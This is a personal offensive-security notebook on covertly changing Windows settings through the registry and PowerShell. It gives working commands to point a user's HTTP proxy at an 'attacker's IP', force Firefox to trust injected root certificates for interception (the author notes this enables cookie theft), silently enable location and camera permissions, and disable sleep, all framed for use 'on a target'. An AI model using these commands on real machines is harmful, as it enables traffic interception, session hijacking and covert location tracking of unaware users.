Windows - Covertly Controlling Settings

## Network and Internet ### Mobile Hotspot See [[Windows - Mobile Hotspot#Covertly Enable Hotspot]]. ### Sharing Wi-Fi Over Ethernet [[2022-10-22_Sat]] - Open the network connections (ncpa.cpl) > go to properties of the Wi-Fi interface > Sharing tab > Check the "Allow other network users to connect through this computer's internet connection" then select "Ethernet" from the dropdown menu. I did this while running [[SysInternals - Process Monitor|ProcMon]] in the background and filtered for registry writes (`RegSetValue`), and after excluding a bunch of other processes and paths, got these operations: ```text 9448 RegSetValue DllHost.exe HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SharedAccess\PublicIndex Type: REG_DWORD, Length: 4, Data: 25 SUCCESS 2312 RegSetValue svchost.exe HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{433ac09c-e8b2-484b-8633-2d12913502d0}\DisableDhcpOnConnect Type: REG_DWORD, Length: 4, Data: 1 SUCCESS 9448 RegSetValue DllHost.exe HKLM\System\CurrentControlSet\Control\Nsi\{eb004a00-9b1a-11d4-9123-0050047759bc}\10\0000000580000600c0a8890100000000 Type: REG_BINARY, Length: 56, Data: FF FF FF FF FF FF FF FF 10 00 00 00 10 00 00 00 SUCCESS 9448 RegSetValue DllHost.exe HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{433ac09c-e8b2-484b-8633-2d12913502d0}\IPAddress Type: REG_MULTI_SZ, Length: 30, Data: 192.168.137.1 SUCCESS 9448 RegSetValue DllHost.exe HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{433ac09c-e8b2-484b-8633-2d12913502d0}\SubnetMask Type: REG_MULTI_SZ, Length: 30, Data: 255.255.255.0 SUCCESS 9448 RegSetValue DllHost.exe HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SharedAccess\PrivateIndex Type: REG_DWORD, Length: 4, Data: 8 SUCCESS 9448 RegSetValue DllHost.exe HKLM\System\CurrentControlSet\Control\Network\SharedAccessConnection\EnableControl Type: REG_DWORD, Length: 4, Data: 0 SUCCESS ``` It should be noted that this string `433ac09c-e8b2-484b-8633-2d12913502d0` is the Ethernet interface's GUID: ```powershell Get-WMIObject Win32_networkadapter | select Name, GUID Name GUID ---- ---- ... Intel(R) Ethernet Connection (13) I219-V {433AC09C-E8B2-484B-8633-2D12913502D0} ... ``` Disabling the internet sharing resulted in these operations: ```text 21276 RegSetValue DllHost.exe HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SharedAccess\PublicIndex Type: REG_DWORD, Length: 4, Data: 25 SUCCESS 21276 RegSetValue DllHost.exe HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SharedAccess\PublicIndex Type: REG_DWORD, Length: 4, Data: 4294967295 SUCCESS 21276 RegSetValue DllHost.exe HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SharedAccess\PrivateIndex Type: REG_DWORD, Length: 4, Data: 4294967295 SUCCESS 2312 RegSetValue svchost.exe HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{98655ebc-af7e-487a-abec-92557ee3f4db}\EnableDhcp Type: REG_DWORD, Length: 4, Data: 1 SUCCESS ``` I stopped at this point. Another way to bridge connections between the Wi-Fi and Ethernet adapters is by creating a Bridge interface as explained in [this article](https://www.how2shout.com/how-to/bridge-wifi-to-ethernet-adapter-to-share-internet.html). Haven't looked into it yet. ### HTTP Proxy Server [[2022-07-07_Thu]] - It's possible to set the HTTP proxy PowerShell, and requires only user privileges (evil laugh) because the proxy is per-user. This is what the "Proxy Settings" GUI is doing in the background: ```bash $proxyRegKey = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings' # Enable proxy Set-ItemProperty -Path $proxyRegKey -name ProxyServer -Value "192.168.30.123:8080" # attacker's IP Set-ItemProperty -Path $proxyRegKey -name ProxyEnable -Value 1 # Disable proxy Set-ItemProperty -Path $proxyRegKey -name ProxyServer -Value "" Set-ItemProperty -Path $proxyRegKey -name ProxyEnable -Value 0 ``` Then test the proxy: ```bash iwr -UseBasicParsing goodreads.com | select StatusCode iwr : The underlying connection was closed: Could not establish trust relationship for the SSL/TLS secure channel. ``` We get this error because the proxy certificate isn't installed. Do so using this technique - [[How Does TLS Work#Windows#Covertly Installing Root Certificate]] (requires admin). Test it again and it should work: ```bash iwr -UseBasicParsing https://ifconfig.me | select StatusCode StatusCode ---------- 200 ``` > It just occurred to me that all of this can be used to steal browser cookies and to [[Pass the Cookie#5 Proxying HTTP S Traffic]]. If any browser processes are open you may need to restart them in order to have them load the computer's root certificates into memory. #### Firefox Initially Firefox still showed the privacy message, but after trying a couple minutes later it went away. [[2022-10-27_Thu]] - I tried again and Firefox wouldn't accept the certificate. After some Googling I came across [this thread](https://support.umbrella.com/hc/en-us/articles/115000669728-Configuring-Firefox-to-use-the-Windows-Certificate-Store) explaining that Firefox by default doesn't accept Root authorities in the user's Windows certificate store, however it's possible to manually modify this by going to `about:config` > *Accept warning* > `security.enterprise_roots.enabled` > Set to *true*. Going through the above with Procmon running in the background showed that enabling this setting modified this file: ```text C:\Users\Maor\AppData\Roaming\Mozilla\Firefox\Profiles\0ymylxck.default-release\prefs-1.js ``` And diffing the file before and after the modification showed that setting it to true inserts the following on line 227: ```text user_pref("security.enterprise_roots.enabled", true); ``` I played around with this and at the end the only one that worked was adding the above to line 227 and restarting Firefox. #### Chrome Process restart required. #### Edge Process restart required. My takeaway is that if I was to go through this process on a target, I'd want to first check what browsers they're using, then what version of the browser, I'd then set up a replica on my end, do testing similar to the above and only then commence with modifications on the target. ## Privacy Under *Settings* > *Privacy* > *App permissions*, enabling any of these features seem to follow the same pattern, which is to change the `Deny` to `Allow` in the `Value` key under: ```text hklm:\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\ ``` Here are all the relevant keys: ```text ls "hklm:\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\" Name Property ---- -------- activity Value : Allow appDiagnostics Value : Allow appointments Value : Allow bluetooth Value : Allow bluetoothSync Value : Allow broadFileSystemAccess Value : Allow cellularData Value : Allow chat Value : Allow contacts Value : Allow documentsLibrary Value : Allow email Value : Allow gazeInput Value : Allow humanInterfaceDevice Value : Allow location Value : Deny microphone Value : Allow phoneCall Value : Allow phoneCallHistory Value : Allow picturesLibrary Value : Allow radios Value : Allow sensors.custom Value : Allow serialCommunication Value : Allow usb Value : Allow userAccountInformation Value : Allow userDataTasks Value : Allow userNotificationListener Value : Allow videosLibrary Value : Allow webcam Value : Deny wifiData Value : Allow wiFiDirect Value : Allow ``` Because the hive is HKLM, modifying any of the above keys will require admin rights. ### Location [[2022-07-08_Fri]] #### Allow access to location on this device ![[Pasted image 20220708152008.png]] Running Process Monitor in the background while toggling the "Allow access to location on this device" on and off shows the four actions: ![[Pasted image 20220708143033.png]] When it's off: ```powershell Get-Item "hklm:\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\location" Name Property ---- -------- location Value : Deny Get-Item "hklm:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Sensor\Overrides\{BFA794E4-F964-4FDB-90F6-51056BFE4B44}" Name Property ---- -------- {BFA794E4-F964-4FDB-90F6-51056BFE4B44} SensorPermissionState : 0 ``` When it's on: ```powershell Get-Item "hklm:\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\location" Name Property ---- -------- location Value : Allow Get-Item "hklm:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Sensor\Overrides\{BFA794E4-F964-4FDB-90F6-51056BFE4B44}" Name Property ---- -------- {BFA794E4-F964-4FDB-90F6-51056BFE4B44} SensorPermissionState : 1 ``` So to covertly turn it on (requires admin): ```powershell > .\geo1.ps1 Access Denied for Location Information > Set-ItemProperty -Path "hklm:\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\location" -Name "Value" -Value "Allow" > .\geo1.ps1 https://maps.google.com/maps?q=32.07845164622014,34.77800536555182 ``` Note that it works regardless of changing the second registry key. #### Allow apps to access your location ![[Pasted image 20220708151930.png]] ```powershell Set-ItemProperty -Path "HKCU:\\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\location" -Name "Value" -Value "Allow" Set-ItemProperty -Path "HKCU:\\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\location" -Name "Value" -Value "Deny" ``` #### Choose which apps can access your precise location ![[Pasted image 20220708153134.png]] ```powershell Set-ItemProperty -Path "HKCU:\\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\location\Microsoft.WindowsMaps_8wekyb3d8bbwe" -Name "Value" -Value "Allow" Set-ItemProperty -Path "HKCU:\\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\location\Microsoft.WindowsMaps_8wekyb3d8bbwe" -Name "Value" -Value "Deny" ``` #### Allow desktop apps to access your location ![[Pasted image 20220708151857.png]] ```powershell Set-ItemProperty -Path "HKCU:\\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\location\NonPackaged" -Name "Value" -Value "Allow" Set-ItemProperty -Path "HKCU:\\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\location\NonPackaged" -Name "Value" -Value "Deny" ``` ### Camera [[2022-07-09_Sat]] - ```powershell Set-ItemProperty -Path "hklm:\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\webcam" -Name "Value" -Value "Allow" ``` Not working for some reason. Probably missing a registry key... ## System ### Power & Sleep The time is represented in the registry in seconds, so 1 hour is `3600` and Never is `0`. Changing the following registries requires SYSTEM privileges: ```powershell Get-Acl -Path "HKLM:\System\CurrentControlSet\Control\Power\User\PowerSchemes\381b4222-f694-41f0-9685-ff5bb260df2e\7516b95f-f776-4464-8c53-06167f40cc99\3c0bc021-c8a8-4e07-a973-6b14cbcb2b7e" | select Owner Owner ----- NT AUTHORITY\SYSTEM ``` However, up until `\User\` the owner is `BUILTIN\Administrators`: ```powershell Get-Acl -Path "HKLM:\System\CurrentControlSet\Control\Power\User\" | select Owner Owner ----- BUILTIN\Administrators ``` So as the owner we could change the permissions on the subsequent registry folders. See [here](https://sudhakaryblog.wordpress.com/2019/09/16/requested-registry-access-is-not-allowed/) and [here](https://www.ntfs.com/ntfs-permissions-acl-use.htm). #### Screen On battery power, turn off after: ```powershell Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Power\User\PowerSchemes\381b4222-f694-41f0-9685-ff5bb260df2e\7516b95f-f776-4464-8c53-06167f40cc99\3c0bc021-c8a8-4e07-a973-6b14cbcb2b7e" -Name "DCSettingIndex" -Value "0" ``` When plugged in, turn off after: ```powershell Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Power\User\PowerSchemes\381b4222-f694-41f0-9685-ff5bb260df2e\7516b95f-f776-4464-8c53-06167f40cc99\3c0bc021-c8a8-4e07-a973-6b14cbcb2b7e" -Name "ACSettingIndex" -Value "0" ``` #### Sleep On battery power, PC goes to sleep after: ```powershell Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Power\User\PowerSchemes\381b4222-f694-41f0-9685-ff5bb260df2e\238c9fa8-0aad-41ed-83f4-97be242c8f20\29f6c1db-86da-48c5-9fdb-f2b67b1f44da\" -Name "DCSettingIndex" -Value "0" ``` When plugged in, PC goes to sleep after: ```powershell Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Power\User\PowerSchemes\381b4222-f694-41f0-9685-ff5bb260df2e\238c9fa8-0aad-41ed-83f4-97be242c8f20\29f6c1db-86da-48c5-9fdb-f2b67b1f44da\" -Name "ACSettingIndex" -Value "0" ``` *** ## Footnotes Resources